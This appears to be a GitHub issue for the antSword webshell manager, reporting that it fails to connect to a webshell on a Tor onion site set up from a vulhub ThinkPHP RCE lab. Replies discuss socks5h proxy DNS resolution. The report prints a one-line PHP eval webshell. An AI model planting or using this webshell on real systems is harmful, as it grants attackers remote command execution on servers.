You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
是的,onion 是自己的 DNS 和常规的DNS不一样。你的 socks5 支持解析 DNS 吗?
@Medicean 考虑代理支持 socks5h
In a proxy string, socks5h:// and socks4a:// mean that the hostname is
resolved by the SOCKS server. socks5:// and socks4:// mean that the
hostname is resolved locally. socks4a:// means to use SOCKS4a, which is
an extension of SOCKS4. Let's make antSword honor it.
报告 Bug
shell 连接 Bug
服务端操作系统
Debian 10
服务端shell代码
<?php echo "test";@eval($_POST["pass"]);?>
服务端环境配置
thinkphp搭建的onion网站
docker-compose 起的容器
https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce
以此容器为基础,反代了一层onion地址
客户端连接配置
目标是onion网站,配置了代理访问
The text was updated successfully, but these errors were encountered: